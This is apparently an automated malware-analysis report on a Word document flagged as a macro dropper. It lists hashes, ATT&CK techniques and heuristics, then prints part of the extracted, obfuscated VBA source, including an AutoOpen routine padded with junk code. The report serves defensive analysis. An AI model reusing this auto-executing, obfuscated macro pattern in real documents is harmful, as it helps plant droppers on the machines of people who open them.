Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8cf43294595a0ed5…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 155.5 KB
Created: 2018-04-26 19:44:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 00c9599e51592cc7059aed2d1d35eaf7
SHA-1: 7a64d92367c9625b969483032cc65ef1cae42dd0
SHA-256: 8cf43294595a0ed5a94dbbd1788cc0cce2bbd8a37fbe6e574982cf2950041b11
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro includes a critical `Shell()` call, indicating an attempt to execute arbitrary commands. This is further supported by ClamAV detecting it as a dropper, suggesting it is designed to download and execute additional malware. The presence of an AutoOpen macro also points to automatic execution when the document is opened.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6520244-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6520244-0
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 50091 bytes
SHA-256: d965e9b8d9a4df3483a850297936c59549f5a448887cc9349b3a9d4a158ab1fb

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "aJniODi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub coTTEB(wQiNmj)
Select Case TMzKN
         Case 42563
            EiiSIj = nbHaL
            jzOuwd = Round(25859)
            LjjSm = Hex(niFiGX - ChrW(YKlBwR))
            IpbmbA = TwCLkI
         Case 58876
            vBzWtQ = CByte(10176)
            YUnhI = Log(dtCLmI)
End Select
End Sub
Sub Hurlw(jCWWP)
Select Case iPjCZ
         Case 45341
            DTCSo = jiUJJ
            WWXnH = Round(15677)
            vzVTCw = Hex(NdZuq - ChrW(ocFBFb))
            SOoPs = zszHb
         Case 53663
            ocMiAA = CByte(39122)
            FFFaS = Log(juQVif)
End Select
Select Case SjJGa
         Case 80085
            iPWwS = nMPXBF
            lMIjo = Round(49976)
            Nwhlsw = Hex(WvDcZK - ChrW(mqjGI))
            tXftU = XUGXZR
         Case 1609
            mjikF = CByte(42089)
            RQLvb = Log(nzWZcj)
End Select
Select Case mqTnR
         Case 29720
            TPXdK = AiFHw
            mNbGT = Round(97351)
            ikVjwz = Hex(wWwMvT - ChrW(zpBthk))
            tFtOa = uqLjAo
         Case 47898
            nwjYja = CByte(53625)
            lsMfLo = Log(aNlOp)
End Select
End Sub
Sub fbVXVq(LMMGu)
Select Case JqVUB
         Case 19513
            PTACvQ = SlWOa
            rIWKBL = Round(68128)
            SZjFl = Hex(fhEsk - ChrW(NZLaS))
            Flnaqz = KRBUKT
         Case 80653
            FzuUzJ = CByte(27247)
            ljdiW = Log(SwvsY)
End Select
Select Case zirii
         Case 48657
            kiMtZu = IbRGVS
            LCuNSK = Round(78324)
            EYRukc = Hex(GLmXj - ChrW(vYmEks))
            ripXF = mjzVP
         Case 29140
            kZnciJ = CByte(1433)
            UGTzjN = Log(dHJiR)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case IZjupV
         Case 81498
            IqWIzt = kKZar
            WYVaWB = Round(43927)
            qLhzK = Hex(zEipoK - ChrW(MPwolT))
            twjHZw = ANTSUT
         Case 77186
            ipLmR = CByte(43986)
            ckmhhK = Log(Zmkhd)
End Select
PmsfNJKPqz (tcZXL + HwbAnbw + wrOWTq)
Select Case tkGdw
         Case 4047
            NUwVs = crnhi
            piZCQn = Round(52028)
            YoOOTq = Hex(QZSJlf - ChrW(wYdEf))
            OHDhoj = bThqp
         Case 45800
            wYGkBB = CByte(80269)
            SVYwH = Log(iAZLHj)
End Select
End Sub
Sub Qljam(zwrbTN)
Select Case JXSsC
         Case 57383
            CphJr = TtTIf
            rNhmZK = Round(28862)
            qPatE = Hex(CYKijI - ChrW(bKbDXi))
            WGdiw = Wqcksi
         Case 76606
            OnOoE = CByte(17905)
            uikcW = Log(QDFiB)
End Select
Select Case Bpjlsz
         Case 36854
            LwZpz = MMXNP
            YrbYs = Round(11956)
            hFnWC = Hex(GmcfBW - ChrW(lzKwIu))
            CrEjsT = DJNKtl
         Case 45398
            GYZXzr = CByte(65172)
            jVqYib = Log(dQzbXq)
End Select
Select Case HdiIC
         Case 56934
            UIkTz = mYkvnU
            XKCvA = Round(53282)
            kuvKAu = Hex(Qwpqo - ChrW(WLMGE))
            kvFjCo = jiwbm
         Case 15918
            BdaNaT = CByte(9334)
            VbuFwQ = Log(LzwrRq)
End Select
End Sub
Sub fNsWzL(TVCiN)
Select Case slzjl
         Case 56967
            Zdlzpm = Swfvqj
            wMUDV = Round(86959)
            CGrWk = Hex(sawPG - ChrW(sGCbvj))
            NHUqG = ijtYic
         Case 29283
            lXWtaF = CByte(47999)
            sAPpC = Log(OwkYXK)
End Select
End Sub

Attribute VB_Name = "FhQliGhzBTn"
Sub DHjfiV(lHOUbR)
Select Case nRznFE
         Case 8173
            fpGIv = rGqjbw
            jfQCDw = Round(48345)
            qNoTp = Hex(PBNOi - ChrW(zbuYZZ))
            uBYozS = DmjlCH
         C
... (truncated)